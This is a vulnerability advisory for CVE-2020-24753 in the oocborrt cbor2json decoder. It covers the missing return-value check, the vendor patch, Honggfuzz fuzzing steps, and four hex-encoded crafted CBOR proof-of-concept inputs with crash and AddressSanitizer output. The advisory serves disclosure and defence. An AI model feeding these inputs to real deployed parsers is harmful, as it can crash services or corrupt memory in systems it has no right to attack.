Summary:

A memory corruption vulnerability in Objective Open CBOR Run-time (oocborrt) before 2020-08-12 could allow an attacker to execute code via crafted Concise Binary Object Representation (CBOR) input to the cbor2json decoder. An uncaught error while decoding CBOR Major Type 3 text strings leads to the use of an attacker-controllable uninitialized stack value. This can be used to modify memory, causing a crash or heap corruption.

CVSS v3.1 Score: 6.5/10

Vulnerability Details:

The cbor2json decoder utility in the Objective Open CBOR Run-time library up through commit de254ab (before 2020-08-12) is missing an error handling check after decoding a UTF8 string in a given CBOR data stream. Since this utility could be integrated into various data interchange systems which parse external inputs, a remote attacker may be able to execute arbitrary code through heap corruption.

cbor2json.c:

112:   case OSRTCBOR_UTF8STR: {
113:      OSUTF8CHAR* utf8str;
114:      ret = rtCborDecDynUTF8Str (pCborCtxt, ub, (char**)&utf8str);
115:
116:      ret = rtJsonEncStringValue (pJsonCtxt, utf8str);
117:      rtxMemFreePtr (pCborCtxt, utf8str);
118:      if (0 != ret) return LOG_RTERR (pJsonCtxt, ret);
119:
120:      break;
121:   }

Line 115 of the above file is missing a check of the return value of rtCborDecDynUTF8Str(). If a malicious CBOR input causes rtCborDecDynUTF8Str() to return prematurely, the error is not caught and utf8str is erroneously passed to rtJsonEncStringValue(). utf8str is attacker-influenced because it is uninitialized stack memory that typically contains a leftover stack value from the decoding of a CBOR data item earlier in the data stream.

Figure 1: Disassembly showing tainted stack address RBP-0x58 passed to rtJsonEncStringValue

In the simplest case, this results in a Segmentation Fault as the program will eventually execute strlen() on a pointer to an invalid memory location. This memory location is influenceable by the attacker. In other cases, the attacker can manipulate the value of utf8str to cause heap corruption, which is generally considered exploitable.

Patch:

The following patch was proposed to the vendor, who pushed a fix to their public GitHub repository within 3 hours of being notified of the issue.

# diff cbor2json.c ../../oocborrt_gold/oocborrt/util/cbor2json.c
115d114
< if (0 != ret) return LOG_RTERR (pJsonCtxt, ret);

This patch inserts the check into the above function like so:

112:   case OSRTCBOR_UTF8STR: {
113:      OSUTF8CHAR* utf8str;
114:      ret = rtCborDecDynUTF8Str (pCborCtxt, ub, (char**)&utf8str);
115:      if (0 != ret) return LOG_RTERR (pJsonCtxt, ret);
116:      ret = rtJsonEncStringValue (pJsonCtxt, utf8str);
117:      rtxMemFreePtr (pCborCtxt, utf8str);
118:      if (0 != ret) return LOG_RTERR (pJsonCtxt, ret);
119:
120:      break;
121:   }
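
The same pattern can be shown in isolation. The sketch below is not oocborrt code: decode_text and convert_one are hypothetical stand-ins for a decoder that can fail before assigning its output pointer, and for a caller shaped like the case block above. It illustrates two habits that would each have contained this bug: initializing the output pointer to NULL, and checking the decoder's return value before the result is used.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical decoder: copies `len` bytes of `src` into a newly
 * allocated NUL-terminated string. On failure it returns a negative
 * status and leaves *out untouched, as a decoder that bails out
 * early would. */
static int decode_text(const char *src, size_t len, char **out)
{
    if (src == NULL) return -2;        /* e.g. unexpected end of buffer */
    char *s = malloc(len + 1);
    if (s == NULL) return -1;          /* allocation failure */
    memcpy(s, src, len);
    s[len] = '\0';
    *out = s;
    return 0;
}

/* Hypothetical caller mirroring the shape of the patched case block. */
static int convert_one(const char *src, size_t len, size_t *out_len)
{
    char *str = NULL;                  /* never leave the pointer uninitialized */
    int ret = decode_text(src, len, &str);
    if (ret != 0) return ret;          /* the check the vulnerable code lacked */

    *out_len = strlen(str);            /* safe: str is known to be valid here */
    free(str);
    return 0;
}
```

With the early return in place, a failed decode never reaches strlen(), so no stale stack value is ever dereferenced.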

Discovery Method:

Fuzz testing (or fuzzing) has been around almost as long as programming has. It is a well-known technique, but recent advances in the art of fuzzing have dramatically increased its popularity among software developers and security researchers alike. American Fuzzy Lop (AFL) in particular has taken the world by storm since its creation in 2013 by Michał Zalewski. The key insight behind AFL was that software bugs are more likely to be found when more code in the target program is covered. A simple fuzzer that supplies completely random data to a program would have to run for an extremely long time to reach deep codepaths and corner cases in the target program where vulnerabilities are likely to lurk. Instead of supplying completely random inputs, coverage-guided fuzzers like AFL and Honggfuzz use instrumentation inserted into a recompiled version of the target program to give feedback to the fuzzer. In this way, the fuzzer can detect when a test input has caused new code paths to execute in the target program and re-use that input in future mutations.

Coverage-guided fuzzing is well suited to CBOR decoders because the fuzzer can, through code coverage metrics, detect when mutations of a CBOR data stream reach deeper code and pass sanity checks. CBOR is a fast fuzzing target because a single byte encodes information about the content that follows it in the data item. This allows simple mutators such as bit flipping to reach new code quickly.

To fuzz cbor2json, simply download the source code from GitHub, identify a test corpus such as the CBOR files already in the repo, compile cbor2json with the Honggfuzz compiler, and then run the fuzzer in a VM on a laptop. If the test corpus is large, minimize it first. Coverage-guided fuzzers are much more effective when they start with a small number of small inputs.

cd lib && rm *.a
cd ../build && make clean && make CC=/path/to/honggfuzz/hfuzz_cc/hfuzz-clang
cd ../util && make CC=/path/to/honggfuzz/hfuzz_cc/hfuzz-clang LINK=/path/to/honggfuzz/hfuzz_cc/hfuzz-clang LINKOPT='-fsanitize=address'
cp message.cbor input_dir/
/path/to/honggfuzz/honggfuzz -i input_dir/ -W work_dir/ -- ./cbor2json -i ___FILE___

For longer-term fuzzing it is always advisable to use “persistent” mode in AFL++ or Honggfuzz to dramatically increase the number of executions per second up to 100,000 execs/second or more. For our purposes here it is enough to simply run Honggfuzz against the program naively, reaching 500 execs/second. Within two seconds of executing the fuzzer, it finds a Segmentation Fault.
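
As a rough illustration of what a persistent-mode harness looks like, the sketch below uses the libFuzzer-style LLVMFuzzerTestOneInput entry point, which Honggfuzz also accepts when the target is built with its compiler wrapper. The function decode_buffer is a hypothetical stand-in for the code under test, not part of oocborrt; a real harness would initialize the CBOR decoder on the supplied buffer and run the conversion there. No main() is defined because the fuzzer's runtime is assumed to supply one.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the code under test. A real harness would
 * set up the decoder on (data, len) and run the CBOR-to-JSON
 * conversion; those library calls are deliberately not shown. */
static int decode_buffer(const uint8_t *data, size_t len)
{
    size_t items = 0;
    for (size_t i = 0; i < len; i++) {
        /* Count bytes whose top three bits are 3 (text string header). */
        if ((data[i] >> 5) == 3) items++;
    }
    return (int)items;
}

/* Called once per test case inside a single long-lived process,
 * which avoids the fork/exec cost paid when fuzzing via input files. */
int LLVMFuzzerTestOneInput(const uint8_t *data, size_t len)
{
    decode_buffer(data, len);
    return 0;   /* harnesses of this style conventionally return 0 */
}
```

The design point is that the target processes each input in memory and returns, so any global state it touches must be reset between calls.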

We let the fuzzer run after changing every assert() to call exit(0) instead of raising SIGABRT so we don’t pollute our findings. Hitting an assert() is not notable in this particular program. Once we have a collection of crashes, we use the gdb exploitable plugin (https://github.com/jfoote/exploitable) to bin and triage crashes with a simple bash script. Fuzzing identified 130 “unique” crashes after 10 days of fuzzing and 300 million execs, all of which turned out to have the same root cause.

With bugs like this one, it is important to always reproduce the issue both on a “stock” binary and on one built with AddressSanitizer (https://clang.llvm.org/docs/AddressSanitizer.html). Since Honggfuzz inserts instrumentation into the binary, it’s possible that an input that crashes under Honggfuzz will not crash when compiled with regular gcc or clang. ASAN is an important tool because it helps to identify the issue earlier in the code path. Many memory corruption bugs will not crash a program, but ASAN uses red zones to immediately detect out of bounds accesses.

Lastly, we want to minimize the inputs that Honggfuzz finds for us. Reporting a huge fuzzer-generated input to a vendor and saying “it crashes!” is better than nothing, but not particularly helpful. One can use minimization tools like afl-tmin to strip the parts of an input that aren’t necessary to cover the same code paths. We used the smallest crashing input files and manually stepped through them in gdb to observe the behavior of the program until the root cause was identified.

Proofs of Concept:

The following CBOR proofs of concept show the various ways in which the previously described missing check can result in memory corruption.

Proof of Concept #1 (Simple segfault):

The PoC input is a binary file with the following contents:

bf61 419f 9fff 7d

Depending on the compiler and the arrangement of memory, this PoC may either exhibit this error handling behavior:

./cbor2json -i poc1
ERROR: Status -2
Unexpected end of buffer on decode
Stack trace: Module: cbor2json.c, Line 154
Module: cbor2json.c, Line 154
Module: cbor2json.c, Line 67
Module: ../rtxsrc/context.c, Line 169
Module: ../rtcborsrc/rtCborDecDynUTF8Str.c, Line 117
Module: ../rtcborsrc/rtCborDecUInt32.c, Line 55
Module: ../rtxsrc/context.c, Line 169

Or a crash:

./cbor2json -i poc1
Segmentation fault

We can break down this minimal crashing input by following the RFC. CBOR is a relatively simple encoding scheme, but it supports nested and indefinite length data items, which can increase the complexity of parsers.

The first byte of our above data stream is 0xBF. The top 3 most significant bits of the byte control the data type, and the 5 least significant bits are “additional information” such as length. Therefore 0xBF can be decoded like so:

Top 3 bits: 0xBF>>5 = 0x5 (map data type)
Bottom 5 bits: 0xBF&0x1F = 0x1F (indefinite length)

Moving through the rest of the data stream:

0x61 = Text string (0x61>>5 == 0x03) of length 1 (0x61&0x1f == 0x1)

0x41 = contents of the text string, ‘A’. This is the key of the first map entry (when converting to JSON, each map entry must begin with a string key)

0x9F = Start of indefinite length array

0x9F = Start of nested indefinite length array

0xFF = Stop code for nested indefinite length array

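0x7D = Text string (0x7D>>5 == 0x03) with additional information 0x1D (0x7D&0x1f), a value the RFC reserves; an indefinite length text string would be 0x7F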

End of file

Note that the outer array, the map, and the final text string are not properly terminated.
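
The split of an initial byte into its two fields can be sketched in a few lines of C. The helper names below are hypothetical and are not taken from oocborrt; the major type names follow the CBOR RFC.

```c
#include <stdint.h>

/* Major type: the three most significant bits of the initial byte. */
static unsigned cbor_major_type(uint8_t b)
{
    return (unsigned)(b >> 5);
}

/* Additional information: the five least significant bits. */
static unsigned cbor_additional_info(uint8_t b)
{
    return (unsigned)(b & 0x1F);
}

/* Human-readable name of the major type encoded in an initial byte. */
static const char *cbor_major_name(uint8_t b)
{
    static const char *const names[8] = {
        "unsigned integer", "negative integer", "byte string",
        "text string", "array", "map", "tag", "simple/float"
    };
    return names[cbor_major_type(b)];
}
```

Applied to the PoC, 0xBF yields major type 5 (map) with additional information 0x1F, 0x61 yields major type 3 (text string) with additional information 0x01, and 0x7D yields major type 3 with additional information 0x1D.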

This 7-byte file can result in a segmentation fault when 0x1 (the length of the first fixed length text string) is dereferenced as [rdi] in strlen(). Since the vulnerability uses old stack frames, the crash may not trigger in all compiled binaries. This is not the only PoC though, and other test cases will reproduce similar behavior.

The value that is dereferenced in the strlen() call is influenced by the attacker. For instance, if we wish to dereference 0x02 instead of 0x01, we can increase the size of the previous UTF-8 text string to 2.

bf62 4141 9f9f ff7d

This input will segfault when dereferencing the value 0x2 in the RDI register.

Using a similar input from the crashes Honggfuzz found shows that some crashes dereference high memory as well, not just near-NULL offsets. For instance, the input below will crash on 0x7700000060.

CBOR Input:

00000000: 877f 7f7e 017f 7f32 777f 7a7f 7f7f 0010
00000010: 005d

Proof of Concept #2 (heap corruption):

Depending on the layout of memory and the heap implementation, similar malformed CBOR files can trigger heap corruption, use-after-free, or double-free conditions. Heap corruption influencing a pointer that is later used to write data can result in arbitrary code execution.

CBOR Input:

bf60 8c60 607b 3f60 4030

./cbor2json -i poc2
malloc(): mismatching next->prev_size (unsorted)
Aborted

Since the cbor2json library and utilities could be compiled for systems without modern heap protections such as those included with glibc, the vulnerability may be easier to exploit on embedded systems.

Proof of Concept #3 (double free):

CBOR Input:

00000000: bf60 8c60 607b 6060 c030

./cbor2json -i poc4
ERROR: Status 0
normal completion status
ERROR: Status -60
Feature not supported: CBOR tag 6
Stack trace: Module: cbor2json.c, Line 181
ERROR: Status 0
normal completion status
Stack trace: Module: cbor2json.c, Line 154
free(): double free detected in tcache 2
Aborted

Proof of Concept #4 (Out of Bounds Heap Access):

CBOR Input:

00000000: 9082 787a 76ff d380 007a 607a 5c78 3030 ..xzv....z`z\x00
00000010: 007f 7a83 0707 0707 7aff 8072 7a7a 7a07 ..z.....z..rzzz.
00000020: 007f 7a77 0707 7a00 7f9a 7707 7a00 7f9a ..zw..z...w.z...
00000030: 7707 0707 5f4f 8022 746f d87f ffff ff7a w..._O."to.....z
00000040: 7a00 7f7a 7717 077a 007f 9a77 0707 000b z..zw..z...w....
00000050: 5f5f 5f7a 7a5f 6430

Running this input under a binary compiled with AddressSanitizer shows an out of bounds read, further indicating that the earlier CBOR data stream influences the location of the invalid memory reads and writes.

==3433867==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c0000000bb at pc 0x7f31daf0edf8 bp 0x7ffd53dc3b50 sp 0x7ffd53dc3300
READ of size 124 at 0x60c0000000bb thread T0
#0 0x7f31daf0edf7 (/lib/x86_64-linux-gnu/libasan.so.5+0x64df7)
#1 0x559e0dc19d27 in rtJsonEncStringValue (/oocborrt/util/cbor2json+0x19d27)
#2 0x559e0dc057eb in cbor2json /oocborrt/util/cbor2json.c:116
#3 0x559e0dc05aeb in cbor2json /oocborrt/util/cbor2json.c:177
#4 0x559e0dc05aeb in cbor2json /oocborrt/util/cbor2json.c:177
#5 0x559e0dc05fbf in main /oocborrt/util/cbor2json.c:291
#6 0x7f31dabcbbba in __libc_start_main ../csu/libc-start.c:308
#7 0x559e0dc05309 in _start (/oocborrt/util/cbor2json+0x5309)

0x60c0000000bb is located 0 bytes to the right of 123-byte region [0x60c000000040,0x60c0000000bb)
allocated by thread T0 here:

#0 0x7f31dafb1628 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x107628)
#1 0x559e0dc0788e in rtxMemAlloc (/oocborrt/util/cbor2json+0x788e)
#2 0x559e0dc15fed in rtCborDecDynUTF8Str (/oocborrt/util/cbor2json+0x15fed)
#3 0x559e0dc057d5 in cbor2json /oocborrt/util/cbor2json.c:114
#4 0x559e0dc05aeb in cbor2json /oocborrt/util/cbor2json.c:177
#5 0x559e0dc05aeb in cbor2json /oocborrt/util/cbor2json.c:177
#6 0x559e0dc05fbf in main /oocborrt/util/cbor2json.c:291
#7 0x7f31dabcbbba in __libc_start_main ../csu/libc-start.c:308

SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0x64df7)

Shadow bytes around the buggy address:

0x0c187fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=>0x0c187fff8010: 00 00 00 00 00 00 00[03]fa fa fa fa fa fa fa fa
0x0c187fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3433867==ABORTING
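
The shadow byte dump above can be cross-checked by hand. The sketch below assumes the default AddressSanitizer mapping on x86-64 Linux, in which the shadow address is (addr >> 3) + 0x7fff8000; the helper names are hypothetical. It computes which shadow byte covers the faulting address and how many bytes of the final 8-byte granule of the 123-byte allocation are addressable.

```c
#include <stdint.h>

/* Assumption: default ASan shadow offset on x86-64 Linux. */
#define ASAN_SHADOW_OFFSET 0x7fff8000ULL

/* Shadow byte address covering application address `addr`
 * (one shadow byte describes 8 application bytes). */
static uint64_t asan_shadow_addr(uint64_t addr)
{
    return (addr >> 3) + ASAN_SHADOW_OFFSET;
}

/* Number of addressable bytes in the last 8-byte granule of a region
 * of `region_size` bytes that starts on an 8-byte boundary
 * (0 means the last granule is fully addressable). */
static unsigned asan_partial_bytes(uint64_t region_size)
{
    return (unsigned)(region_size % 8);
}
```

For the faulting address 0x60c0000000bb this gives shadow address 0x0c187fff8017, the bracketed byte in the row starting at 0x0c187fff8010. For the 123-byte region it gives 3, matching the [03] shadow value: only the first three bytes of the final granule are addressable, and the read touches the byte just past them.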

Conclusion:

Fuzzing is becoming integrated more and more often into the software development lifecycle. Projects such as Google’s OSS-Fuzz are bringing fuzzing to almost all major open source projects. Furthermore, as it becomes harder and harder to find shallow vulnerabilities quickly exposed by first generation coverage-guided fuzzers and a limited corpus, new tools and more complex techniques are arising. Nevertheless, there are still many codebases that have never been fuzzed, which present a great opportunity for researchers to dive into fuzzing.

CVE-2020-24753: Memory corruption vulnerability in oocborrt